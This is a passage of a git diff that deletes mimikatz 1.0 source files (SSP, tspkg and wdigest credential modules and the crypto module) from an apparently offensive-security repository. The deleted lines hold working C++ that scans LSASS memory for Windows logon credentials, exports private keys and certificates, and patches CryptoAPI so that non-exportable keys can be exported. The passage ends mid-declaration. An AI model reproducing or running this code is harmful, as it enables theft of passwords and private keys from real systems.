if(mod_memory::readMemory(mesCredentials.Flink, &mesCredentials, sizeof(KIWI_SSP_CREDENTIAL_LIST_ENTRY), mod_mimikatz_sekurlsa::hLSASS)) - { - if(RtlEqualLuid(logId, &(mesCredentials.LogonId))) - { - mod_mimikatz_sekurlsa::genericCredsToStream(&mesCredentials.credentials, justSecurity, true, &monNb); - monNb++; - } - } - } - } - } - else (*outputStream) << L"n.a. (SSP KO)"; - - return true; -}
\ No newline at end of file diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/ssp.h b/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/ssp.h deleted file mode 100644 index d2d5396..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/ssp.h +++ /dev/null @@ -1,32 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ - Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#pragma once -#include "../mod_mimikatz_sekurlsa.h" - -class mod_mimikatz_sekurlsa_ssp { - -private: - typedef struct _KIWI_SSP_CREDENTIAL_LIST_ENTRY { - struct _KIWI_SSP_CREDENTIAL_LIST_ENTRY *Flink; - struct _KIWI_SSP_CREDENTIAL_LIST_ENTRY *Blink; - ULONG References; - ULONG CredentialReferences; - LUID LogonId; - ULONG unk0; - ULONG unk1; - ULONG unk2; - KIWI_GENERIC_PRIMARY_CREDENTIAL credentials; - } KIWI_SSP_CREDENTIAL_LIST_ENTRY, *PKIWI_SSP_CREDENTIAL_LIST_ENTRY; - - static PKIWI_SSP_CREDENTIAL_LIST_ENTRY SspCredentialList; - static bool searchSSPEntryList(); - -public: - static mod_process::PKIWI_VERY_BASIC_MODULEENTRY pModMSV; - static bool getSSP(vector<wstring> * arguments); - static bool WINAPI getSSPLogonData(__in PLUID logId, __in bool justSecurity); -}; diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/tspkg.cpp b/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/tspkg.cpp deleted file mode 100644 index 71e3751..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/tspkg.cpp +++ /dev/null @@ -1,94 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ - Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "tspkg.h" -#include "..\..\global.h" -mod_process::PKIWI_VERY_BASIC_MODULEENTRY mod_mimikatz_sekurlsa_tspkg::pModTSPKG = NULL; -PRTL_AVL_TABLE mod_mimikatz_sekurlsa_tspkg::TSGlobalCredTable = NULL; //reinterpret_cast<PRTL_AVL_TABLE>(NULL); - -bool mod_mimikatz_sekurlsa_tspkg::getTsPkg(vector<wstring> * arguments) -{ - vector<pair<mod_mimikatz_sekurlsa::PFN_ENUM_BY_LUID, wstring>> monProvider; - monProvider.push_back(make_pair<mod_mimikatz_sekurlsa::PFN_ENUM_BY_LUID, wstring>(getTsPkgLogonData, wstring(L"tspkg"))); - return mod_mimikatz_sekurlsa::getLogonData(arguments, &monProvider); -} - -bool mod_mimikatz_sekurlsa_tspkg::searchTSPKGFuncs() -{ -#ifdef _M_X64 - BYTE PTRN_WALL_TSGlobalCredTable[] = {0x48, 0x83, 0xec, 0x20, 0x48, 0x8d, 0x0d}; - LONG OFFS_WALL_TSGlobalCredTable = sizeof(PTRN_WALL_TSGlobalCredTable); -#elif defined _M_IX86 - BYTE PTRN_WNO8_TSGlobalCredTable[] = {0x8b, 0xff, 0x55, 0x8b, 0xec, 0x51, 0x56, 0xbe}; - LONG OFFS_WNO8_TSGlobalCredTable = sizeof(PTRN_WNO8_TSGlobalCredTable); - - BYTE PTRN_WIN8_TSGlobalCredTable[] = {0x8b, 0xff, 0x53, 0xbb}; - LONG OFFS_WIN8_TSGlobalCredTable = sizeof(PTRN_WIN8_TSGlobalCredTable); -#endif - - if(mod_mimikatz_sekurlsa::searchLSASSDatas() && pModTSPKG && !TSGlobalCredTable) - { - PBYTE *pointeur = NULL; PBYTE pattern = NULL; ULONG taille = 0; LONG offset = 0; - - pointeur= reinterpret_cast<PBYTE *>(&TSGlobalCredTable); -#ifdef _M_X64 - pattern = PTRN_WALL_TSGlobalCredTable; - taille = sizeof(PTRN_WALL_TSGlobalCredTable); - offset = OFFS_WALL_TSGlobalCredTable; -#elif defined _M_IX86 - if(mod_system::GLOB_Version.dwBuildNumber < 8000) - { - pattern = PTRN_WNO8_TSGlobalCredTable; - taille = sizeof(PTRN_WNO8_TSGlobalCredTable); - offset = OFFS_WNO8_TSGlobalCredTable; - } - else - { - pattern = PTRN_WIN8_TSGlobalCredTable; - taille = sizeof(PTRN_WIN8_TSGlobalCredTable); - offset = OFFS_WIN8_TSGlobalCredTable; - } -#endif - - if(HMODULE monModule = LoadLibrary(L"tspkg")) - { - MODULEINFO mesInfos; - if(GetModuleInformation(GetCurrentProcess(), monModule, &mesInfos, sizeof(MODULEINFO))) - { - mod_memory::genericPatternSearch(pointeur, L"tspkg", pattern, taille, offset); - *pointeur += pModTSPKG->modBaseAddr - reinterpret_cast<PBYTE>(mesInfos.lpBaseOfDll); - } - FreeLibrary(monModule); - } - } - return (pModTSPKG && TSGlobalCredTable); -} - -bool WINAPI mod_mimikatz_sekurlsa_tspkg::getTsPkgLogonData(__in PLUID logId, __in bool justSecurity) -{ - if(searchTSPKGFuncs()) - { - PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCreds = NULL; - BYTE * monBuffP = new BYTE[sizeof(KIWI_TS_CREDENTIAL)], * monBuffC = new BYTE[sizeof(KIWI_TS_PRIMARY_CREDENTIAL)]; - if(PKIWI_TS_CREDENTIAL pLogSession = reinterpret_cast<PKIWI_TS_CREDENTIAL>(mod_mimikatz_sekurlsa::getPtrFromAVLByLuid(TSGlobalCredTable, FIELD_OFFSET(KIWI_TS_CREDENTIAL, LocallyUniqueIdentifier), logId))) - { - if(mod_memory::readMemory(pLogSession, monBuffP, sizeof(KIWI_TS_CREDENTIAL), mod_mimikatz_sekurlsa::hLSASS)) - { - pLogSession = reinterpret_cast<PKIWI_TS_CREDENTIAL>(monBuffP); - if(pLogSession->pTsPrimary) - { - if(mod_memory::readMemory(pLogSession->pTsPrimary, monBuffC, sizeof(KIWI_TS_PRIMARY_CREDENTIAL), mod_mimikatz_sekurlsa::hLSASS)) - mesCreds = &(reinterpret_cast<PKIWI_TS_PRIMARY_CREDENTIAL>(monBuffC)->credentials); - } - else (*outputStream) << L"n.s. (SuppCred KO) / "; - } - } - mod_mimikatz_sekurlsa::genericCredsToStream(mesCreds, justSecurity, true); - delete [] monBuffC, monBuffP; - } - else (*outputStream) << L"n.a. (tspkg KO)"; - return true; -} diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/tspkg.h b/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/tspkg.h deleted file mode 100644 index 35a3b15..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/tspkg.h +++ /dev/null @@ -1,37 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ - Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#pragma once -#include "../mod_mimikatz_sekurlsa.h" - -class mod_mimikatz_sekurlsa_tspkg { - -private: - typedef struct _KIWI_TS_PRIMARY_CREDENTIAL { - PVOID unk0; // lock ? - KIWI_GENERIC_PRIMARY_CREDENTIAL credentials; - } KIWI_TS_PRIMARY_CREDENTIAL, *PKIWI_TS_PRIMARY_CREDENTIAL; - - typedef struct _KIWI_TS_CREDENTIAL { - #ifdef _M_X64 - BYTE unk0[108]; - #elif defined _M_IX86 - BYTE unk0[64]; - #endif - LUID LocallyUniqueIdentifier; - PVOID unk1; - PVOID unk2; - PKIWI_TS_PRIMARY_CREDENTIAL pTsPrimary; - } KIWI_TS_CREDENTIAL, *PKIWI_TS_CREDENTIAL; - - static PRTL_AVL_TABLE TSGlobalCredTable; - static bool searchTSPKGFuncs(); - -public: - static mod_process::PKIWI_VERY_BASIC_MODULEENTRY pModTSPKG; - static bool getTsPkg(vector<wstring> * arguments); - static bool WINAPI getTsPkgLogonData(__in PLUID logId, __in bool justSecurity); -}; diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/wdigest.cpp b/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/wdigest.cpp deleted file mode 100644 index b6e3062..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/wdigest.cpp +++ /dev/null @@ -1,91 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ - Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "wdigest.h" -#include "..\..\global.h" -mod_process::PKIWI_VERY_BASIC_MODULEENTRY mod_mimikatz_sekurlsa_wdigest::pModWDIGEST = NULL; -mod_mimikatz_sekurlsa_wdigest::PKIWI_WDIGEST_LIST_ENTRY mod_mimikatz_sekurlsa_wdigest::l_LogSessList = NULL; -long mod_mimikatz_sekurlsa_wdigest::offsetWDigestPrimary = 0; - -bool mod_mimikatz_sekurlsa_wdigest::getWDigest(vector<wstring> * arguments) -{ - vector<pair<mod_mimikatz_sekurlsa::PFN_ENUM_BY_LUID, wstring>> monProvider; - monProvider.push_back(make_pair<mod_mimikatz_sekurlsa::PFN_ENUM_BY_LUID, wstring>(getWDigestLogonData, wstring(L"wdigest"))); - return mod_mimikatz_sekurlsa::getLogonData(arguments, &monProvider); -} - -bool mod_mimikatz_sekurlsa_wdigest::searchWDigestEntryList() -{ -#ifdef _M_X64 - BYTE PTRN_WNO8_InsertInLogSess[]= {0x4c, 0x89, 0x1b, 0x48, 0x89, 0x43, 0x08, 0x49, 0x89, 0x5b, 0x08, 0x48, 0x8d}; - BYTE PTRN_W8CP_InsertInLogSess[]= {0x4c, 0x89, 0x1b, 0x48, 0x89, 0x4b, 0x08, 0x49, 0x8b, 0x43, 0x08, 0x4c, 0x39}; - BYTE PTRN_W8RP_InsertInLogSess[]= {0x4c, 0x89, 0x1b, 0x48, 0x89, 0x43, 0x08, 0x49, 0x39, 0x43, 0x08, 0x0f, 0x85}; -#elif defined _M_IX86 - BYTE PTRN_WNO8_InsertInLogSess[]= {0x8b, 0x45, 0x08, 0x89, 0x08, 0xc7, 0x40, 0x04}; - BYTE PTRN_W8CP_InsertInLogSess[]= {0x89, 0x0e, 0x89, 0x56, 0x04, 0x8b, 0x41, 0x04}; - BYTE PTRN_W8RP_InsertInLogSess[]= {0x89, 0x06, 0x89, 0x4e, 0x04, 0x39, 0x48, 0x04}; -#endif - LONG OFFS_WALL_InsertInLogSess = -4; - - if(mod_mimikatz_sekurlsa::searchLSASSDatas() && pModWDIGEST && !l_LogSessList) - { - PBYTE *pointeur = NULL; PBYTE pattern = NULL; ULONG taille = 0; LONG offset = 0; - - pointeur= reinterpret_cast<PBYTE *>(&l_LogSessList); - offset = OFFS_WALL_InsertInLogSess; - if(mod_system::GLOB_Version.dwBuildNumber < 8000) - { - pattern = PTRN_WNO8_InsertInLogSess; - taille = sizeof(PTRN_WNO8_InsertInLogSess); - } - else if(mod_system::GLOB_Version.dwBuildNumber < 8400) - { - pattern = PTRN_W8CP_InsertInLogSess; - taille = sizeof(PTRN_W8CP_InsertInLogSess); - } - else - { - pattern = PTRN_W8RP_InsertInLogSess; - taille = sizeof(PTRN_W8RP_InsertInLogSess); - } - - if(HMODULE monModule = LoadLibrary(L"wdigest")) - { - MODULEINFO mesInfos; - if(GetModuleInformation(GetCurrentProcess(), monModule, &mesInfos, sizeof(MODULEINFO))) - { - mod_memory::genericPatternSearch(pointeur, L"wdigest", pattern, taille, offset, "SpInstanceInit", false); - *pointeur += pModWDIGEST->modBaseAddr - reinterpret_cast<PBYTE>(mesInfos.lpBaseOfDll); - } - FreeLibrary(monModule); - } - -#ifdef _M_X64 - offsetWDigestPrimary = ((mod_system::GLOB_Version.dwMajorVersion < 6) ? ((mod_system::GLOB_Version.dwMinorVersion < 2) ? 36 : 48) : 48); -#elif defined _M_IX86 - offsetWDigestPrimary = ((mod_system::GLOB_Version.dwMajorVersion < 6) ? ((mod_system::GLOB_Version.dwMinorVersion < 2) ? 36 : 28) : 32); -#endif - } - return (pModWDIGEST && l_LogSessList); -} - -bool WINAPI mod_mimikatz_sekurlsa_wdigest::getWDigestLogonData(__in PLUID logId, __in bool justSecurity) -{ - if(searchWDigestEntryList()) - { - PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCreds = NULL; - DWORD taille = offsetWDigestPrimary + sizeof(KIWI_GENERIC_PRIMARY_CREDENTIAL); - BYTE * monBuff = new BYTE[taille]; - if(PLIST_ENTRY pLogSession = mod_mimikatz_sekurlsa::getPtrFromLinkedListByLuid(reinterpret_cast<PLIST_ENTRY>(l_LogSessList), FIELD_OFFSET(KIWI_WDIGEST_LIST_ENTRY, LocallyUniqueIdentifier), logId)) - if( mod_memory::readMemory(pLogSession, monBuff, taille, mod_mimikatz_sekurlsa::hLSASS)) - mesCreds = reinterpret_cast<PKIWI_GENERIC_PRIMARY_CREDENTIAL>(reinterpret_cast<PBYTE>(monBuff) + offsetWDigestPrimary); - mod_mimikatz_sekurlsa::genericCredsToStream(mesCreds, justSecurity); - delete [] monBuff; - } - else (*outputStream) << L"n.a. (wdigest KO)"; - - return true; -} diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/wdigest.h b/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/wdigest.h deleted file mode 100644 index 9db3c8b..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/wdigest.h +++ /dev/null @@ -1,29 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ - Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#pragma once -#include "../mod_mimikatz_sekurlsa.h" - -class mod_mimikatz_sekurlsa_wdigest { - -private: - typedef struct _KIWI_WDIGEST_LIST_ENTRY { - struct _KIWI_WDIGEST_LIST_ENTRY *Flink; - struct _KIWI_WDIGEST_LIST_ENTRY *Blink; - DWORD UsageCount; - struct _KIWI_WDIGEST_LIST_ENTRY *This; - LUID LocallyUniqueIdentifier; - } KIWI_WDIGEST_LIST_ENTRY, *PKIWI_WDIGEST_LIST_ENTRY; - - static PKIWI_WDIGEST_LIST_ENTRY l_LogSessList; - static long offsetWDigestPrimary; - static bool searchWDigestEntryList(); - -public: - static mod_process::PKIWI_VERY_BASIC_MODULEENTRY pModWDIGEST; - static bool getWDigest(vector<wstring> * arguments); - static bool WINAPI getWDigestLogonData(__in PLUID logId, __in bool justSecurity); -};
\ No newline at end of file diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_crypto.cpp b/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_crypto.cpp deleted file mode 100644 index a869cd8..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_crypto.cpp +++ /dev/null @@ -1,594 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "mod_mimikatz_crypto.h" -#include "..\global.h" - -vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> mod_mimikatz_crypto::getMimiKatzCommands() -{ - vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> monVector; - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(listProviders, L"listProviders", L"Liste les providers installés)")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(listStores, L"listStores", L"Liste les magasins système")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(listCertificates, L"listCertificates", L"Liste les certificats")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(listKeys, L"listKeys", L"Liste les conteneurs de clés")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(exportCertificates, L"exportCertificates", L"Exporte les certificats")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(exportKeys, L"exportKeys", L"Exporte les clés")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(patchcng, L"patchcng", L"[experimental] Patch le gestionnaire de clés pour l\'export de clés non exportable")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(patchcapi, L"patchcapi", L"[experimental] Patch la CryptoAPI courante pour l\'export de clés non exportable")); - return monVector; -} - -bool mod_mimikatz_crypto::listProviders(vector<wstring> * arguments) -{ - vector<wstring> * monVectorProviders = new vector<wstring>(); - /* CryptoAPI */ - (*outputStream) << L"Providers CryptoAPI :" << endl; - if(mod_cryptoapi::getVectorProviders(monVectorProviders)) - for(vector<wstring>::iterator monProvider = monVectorProviders->begin(); monProvider != monVectorProviders->end(); monProvider++) - (*outputStream) << L'\t' << *monProvider << endl; - else (*outputStream) << L"mod_cryptoapi::getVectorProviders : " << mod_system::getWinError() << endl; - - /* CryptoNG */ - if(mod_cryptong::isNcrypt) - { - (*outputStream) << endl; - monVectorProviders->clear(); - - (*outputStream) << L"Providers CNG :" << endl; - if(mod_cryptong::getVectorProviders(monVectorProviders)) - for(vector<wstring>::iterator monProvider = monVectorProviders->begin(); monProvider != monVectorProviders->end(); monProvider++) - (*outputStream) << L'\t' << *monProvider << endl; - else (*outputStream) << L"mod_cryptong::getVectorProviders : " << mod_system::getWinError() << endl; - } - delete monVectorProviders; - return true; -} - -bool mod_mimikatz_crypto::listKeys(vector<wstring> * arguments) -{ - listAndOrExportKeys(arguments, false); - return true; -} - -bool mod_mimikatz_crypto::exportKeys(vector<wstring> * arguments) -{ - listAndOrExportKeys(arguments, true); - return true; -} - -bool mod_mimikatz_crypto::listStores(vector<wstring> * arguments) -{ - wstring monEmplacement = (arguments->empty() ? L"CERT_SYSTEM_STORE_CURRENT_USER" : arguments->front()); - - (*outputStream) << L"Emplacement : \'" << monEmplacement << L'\''; - - DWORD systemStore; - if(mod_crypto::getSystemStoreFromString(monEmplacement, &systemStore)) - { - (*outputStream) << endl; - vector<wstring> * mesStores = new vector<wstring>(); - if(mod_crypto::getVectorSystemStores(mesStores, systemStore)) - for(vector<wstring>::iterator monStore = mesStores->begin(); monStore != mesStores->end(); monStore++) - (*outputStream) << L'\t' << *monStore << endl; - else (*outputStream) << L"mod_crypto::getListSystemStores : " << mod_system::getWinError() << endl; - delete mesStores; - } - else (*outputStream) << L" introuvable !" << endl; - return true; -} - -bool mod_mimikatz_crypto::listCertificates(vector<wstring> * arguments) -{ - listAndOrExportCertificates(arguments, false); - return true; -} - -bool mod_mimikatz_crypto::exportCertificates(vector<wstring> * arguments) -{ - listAndOrExportCertificates(arguments, true); - return true; -} - -void mod_mimikatz_crypto::listAndOrExportKeys(vector<wstring> * arguments, bool exportKeys) -{ - bool isMachine = false; - DWORD providerType = PROV_RSA_FULL; - wstring provider = MS_ENHANCED_PROV; - - switch (arguments->size()) - { - case 1: - isMachine = true; - case 0: - break; - case 3: - isMachine = true; - arguments->erase(arguments->begin()); - case 2: - mod_cryptoapi::getProviderString(arguments->front(), &provider); - mod_cryptoapi::getProviderTypeFromString(arguments->back(), &providerType); - break; - default : - (*outputStream) << L"Erreur d\'arguments, attendu : [machine] [provider providerType]" << endl; - return; - } - - - wstring type = (isMachine ? L"machine" : L"user"); - - vector<wstring> * monVectorKeys = new vector<wstring>(); - - /* CryptoAPI */ - (*outputStream) << L"[" << type << L"] Clés CryptoAPI :" << endl; - if(mod_cryptoapi::getVectorContainers(monVectorKeys, isMachine)) - { - DWORD i; - vector<wstring>::iterator monContainer; - for(i = 0, monContainer = monVectorKeys->begin(); monContainer != monVectorKeys->end(); monContainer++, i++) - { - (*outputStream) << L"\t - " << *monContainer << endl; - - HCRYPTPROV hCryptKeyProv = NULL; - if(CryptAcquireContext(&hCryptKeyProv, monContainer->c_str(), provider.c_str(), providerType, NULL | (isMachine ? CRYPT_MACHINE_KEYSET : NULL))) - { - HCRYPTKEY maCle = NULL; - for(DWORD ks = AT_KEYEXCHANGE; (ks <= AT_SIGNATURE) && !maCle; ks++) - { - if(CryptGetUserKey(hCryptKeyProv, ks, &maCle)) - { - (*outputStream) << L"\t\tType : " << mod_crypto::KeyTypeToString(ks) << endl; - DWORD param = 0, taille = sizeof(param); - if(CryptGetKeyParam(maCle, KP_PERMISSIONS, reinterpret_cast<BYTE *>(¶m), &taille, NULL)) - (*outputStream) << L"\t\tExportabilité : " << (param & CRYPT_EXPORT ? L"OUI" : L"NON") << endl; - if(CryptGetKeyParam(maCle, KP_KEYLEN, reinterpret_cast<BYTE *>(¶m), &taille, NULL)) - (*outputStream) << L"\t\tTaille clé : " << param << endl; - - if(exportKeys) - { - bool reussite = false; - BYTE * monExport = NULL; - DWORD tailleExport = 0; - - wstringstream monBuff; - wstring containerName = *monContainer; - sanitizeFileName(&containerName); - - monBuff << L"capi_" << type << L'_' << i << L'_' << containerName << L".pvk"; - - if(mod_cryptoapi::getPrivateKey(maCle, &monExport, &tailleExport)) - { - reussite = mod_crypto::PrivateKeyBlobToPVK(monExport, tailleExport, monBuff.str(), ks); - delete[] monExport; - } - - (*outputStream) << L"\t\tExport privé dans \'" << monBuff.str() << L"\' : " << (reussite ? L"OK" : L"KO") << endl; - if(!reussite) - { - (*outputStream) << L"\t\t\tmod_cryptoapi::getPrivateKey/PrivateKeyBlobToPVK : " << mod_system::getWinError() << endl; - } - } - } - } - - if(maCle) - CryptDestroyKey(maCle); - else - (*outputStream) << L"\t\t* Erreur de clé ; " << mod_system::getWinError() << endl; - - - CryptReleaseContext(hCryptKeyProv, 0); - } - else (*outputStream) << L"\t\t* Erreur d\'acquisition de la clé ; " << mod_system::getWinError() << endl; - } - } - else (*outputStream) << L"mod_cryptoapi::getVectorContainers : " << mod_system::getWinError() << endl; - - /* CryptoNG */ - if(mod_cryptong::isNcrypt) - { - (*outputStream) << endl; - monVectorKeys->clear(); - - (*outputStream) << L"[" << type << L"] Clés CNG :" << endl; - if(mod_cryptong::getVectorContainers(monVectorKeys, isMachine)) - { - DWORD i; - vector<wstring>::iterator monContainer; - for(i = 0, monContainer = monVectorKeys->begin(); monContainer != monVectorKeys->end(); monContainer++, i++) - { - (*outputStream) << L"\t - " << *monContainer << endl; - - NCRYPT_KEY_HANDLE maCle; - if(mod_cryptong::getHKeyFromName(*monContainer, &maCle, isMachine)) - { - bool exportable = false; - DWORD size = 0; - - if(mod_cryptong::isKeyExportable(&maCle, &exportable)) - (*outputStream) << L"\t\tExportabilité : " << (exportable ? L"OUI" : L"NON") << endl; - if(mod_cryptong::getKeySize(&maCle, &size)) - (*outputStream) << L"\t\tTaille clé : " << size << endl; - - if(exportKeys) - { - bool reussite = false; - BYTE * monExport = NULL; - DWORD tailleExport = 0; - - wstringstream monBuff; - monBuff << L"cng_" << type << L'_' << i << L'_' << *monContainer << L".pvk"; - - if(mod_cryptong::getPrivateKey(maCle, &monExport, &tailleExport)) - { - reussite = mod_crypto::PrivateKeyBlobToPVK(monExport, tailleExport, monBuff.str()); - delete[] monExport; - } - - (*outputStream) << L"\t\tExport privé dans \'" << monBuff.str() << L"\' : " << (reussite ? L"OK" : L"KO") << endl; - if(!reussite) - { - (*outputStream) << L"\t\t\tmod_cryptong::getPrivateKey/PrivateKeyBlobToPVK : " << mod_system::getWinError() << endl; - } - } - mod_cryptong::NCryptFreeObject(maCle); - } - } - } - else (*outputStream) << L"mod_cryptong::getVectorContainers : " << mod_system::getWinError() << endl; - } - - delete monVectorKeys; -} - - -void mod_mimikatz_crypto::listAndOrExportCertificates(vector<wstring> * arguments, bool exportCert) -{ - wstring monEmplacement = L"CERT_SYSTEM_STORE_CURRENT_USER"; - wstring monStore = L"My"; - - if(arguments->size() == 1) - { - monEmplacement = arguments->front(); - } - else if(arguments->size() == 2) - { - monEmplacement = arguments->front(); - monStore = arguments->back(); - } - - (*outputStream) << L"Emplacement : \'" << monEmplacement << L'\''; - - DWORD systemStore; - if(mod_crypto::getSystemStoreFromString(monEmplacement, &systemStore)) - { - (*outputStream) << L"\\" << monStore << endl; - if(HCERTSTORE hCertificateStore = CertOpenStore(CERT_STORE_PROV_SYSTEM, NULL, NULL, systemStore | CERT_STORE_OPEN_EXISTING_FLAG | CERT_STORE_READONLY_FLAG, monStore.c_str())) - { - DWORD i; - PCCERT_CONTEXT pCertContext; - for (i = 0, pCertContext = CertEnumCertificatesInStore(hCertificateStore, NULL); pCertContext != NULL; pCertContext = CertEnumCertificatesInStore(hCertificateStore, pCertContext), i++) - { - wstring * certName = new wstring(); - bool reussite = false; - - if(!mod_crypto::getCertNameFromCertCTX(pCertContext, certName)) - certName->assign(L"[empty]"); - - (*outputStream) << L"\t - " << *certName << endl;; - sanitizeFileName(certName); - - wstringstream monBuff; - monBuff << monEmplacement << L'_' << monStore << L'_' << i << L'_' << *certName << L'.'; - - mod_crypto::KIWI_KEY_PROV_INFO keyProvInfo; - if(mod_crypto::getKiwiKeyProvInfo(pCertContext, &keyProvInfo)) - { - (*outputStream) << L"\t\tContainer Clé : " << keyProvInfo.pwszContainerName << endl; - (*outputStream) << L"\t\tProvider : " << keyProvInfo.pwszProvName << endl; - - HCRYPTPROV_OR_NCRYPT_KEY_HANDLE monProv = NULL; - DWORD keySpec = 0; - BOOL aFermer = false; - - if(CryptAcquireCertificatePrivateKey(pCertContext, CRYPT_ACQUIRE_ALLOW_NCRYPT_KEY_FLAG /* CRYPT_ACQUIRE_SILENT_FLAG NULL */, NULL, &monProv, &keySpec, &aFermer)) - { - (*outputStream) << L"\t\tType : " << mod_crypto::KeyTypeToString(keySpec) << endl; - - DWORD size = 0; - bool exportable = false; - - if(keySpec == CERT_NCRYPT_KEY_SPEC) - { - if(mod_cryptong::isNcrypt) - { - reussite = mod_cryptong::getKeySize(&monProv, &size); - reussite &=mod_cryptong::isKeyExportable(&monProv, &exportable); - - if(aFermer) - { - mod_cryptong::NCryptFreeObject(monProv); - } - } - else (*outputStream) << L"\t\t\tErreur : Clé de type nCrypt, sans nCrypt ?" << endl; - } - else - { - DWORD tailleEcrite = 0; - DWORD exportability; - - HCRYPTKEY maCle = NULL; - if(reussite = (CryptGetUserKey(monProv, keySpec, &maCle) != 0)) - { - tailleEcrite = sizeof(DWORD); - reussite = (CryptGetKeyParam(maCle, KP_KEYLEN, reinterpret_cast<BYTE *>(&size), &tailleEcrite, NULL) != 0); - tailleEcrite = sizeof(DWORD); - reussite &= (CryptGetKeyParam(maCle, KP_PERMISSIONS, reinterpret_cast<BYTE *>(&exportability), &tailleEcrite, NULL) != 0); - exportable = (exportability & CRYPT_EXPORT) != 0; - } - - if(aFermer) - { - CryptReleaseContext(monProv, 0); - } - } - if(reussite) - { - (*outputStream) << L"\t\tExportabilité : " << (exportable ? L"OUI" : L"NON") << endl; - (*outputStream) << L"\t\tTaille clé : " << size << endl; - } - - if(exportCert) - { - wstring PFXFile = monBuff.str(); - PFXFile.append(L"pfx"); - - reussite = mod_crypto::CertCTXtoPFX(pCertContext, PFXFile, L"mimikatz"); - - (*outputStream) << L"\t\tExport privé dans \'" << PFXFile << L"\' : " << (reussite ? L"OK" : L"KO") << endl; - if(!reussite) - { - (*outputStream) << L"\t\t\t" << mod_system::getWinError() << endl; - } - } - } - else (*outputStream) << L"CryptAcquireCertificatePrivateKey : " << mod_system::getWinError() << endl; - } - - if(exportCert) - { - wstring DERFile = monBuff.str(); - DERFile.append(L"der"); - - reussite = mod_crypto::CertCTXtoDER(pCertContext, DERFile); - - (*outputStream) << L"\t\tExport public dans \'" << DERFile << L"\' : " << (reussite ? L"OK" : L"KO") << endl; - if(!reussite) - { - (*outputStream) << L"\t\t\t" << mod_system::getWinError() << endl; - } - } - delete certName; - } - CertCloseStore(hCertificateStore, CERT_CLOSE_STORE_FORCE_FLAG); - } - else (*outputStream) << L"CertOpenStore : " << mod_system::getWinError() << endl; - } - else (*outputStream) << L" introuvable !" << endl; -} - - -bool mod_mimikatz_crypto::patchcapi(vector<wstring> * arguments) -{ - wchar_t LIBNAME_WALL_RSA[] = L"rsaenh.dll"; - char FUNCNAM_WALL_EXPORT[] = "CPExportKey"; -#ifdef _M_X64 - BYTE PTRN_WIN5_CPExportKey_4001[] = {0x0c, 0x01, 0x40, 0x00, 0x00, 0x75}; - BYTE PTRN_WIN5_CPExportKey_4000[] = {0x0c, 0x0e, 0x72}; - BYTE PATC_WIN5_CPExportKey_EXPORT[] = {0xeb}; - LONG OFFS_WIN5_CPExportKey_4001_EXPORT = -4; - LONG OFFS_WIN5_CPExportKey_4000_EXPORT = -5; - - BYTE PTRN_W6AL_CPExportKey_4001[] = {0x0c, 0x01, 0x40, 0x00, 0x00, 0x0f, 0x85}; - BYTE PTRN_WIN6_CPExportKey_4000[] = {0x0c, 0x0e, 0x0f, 0x82}; - BYTE PTRN_WIN8_CPExportKey_4000[] = {0x0c, 0x00, 0x40, 0x00, 0x00, 0x0f, 0x85}; - BYTE PATC_W6AL_CPExportKey_EXPORT[] = {0x90, 0xe9}; - LONG OFFS_W6AL_CPExportKey_EXPORT = 5; - LONG 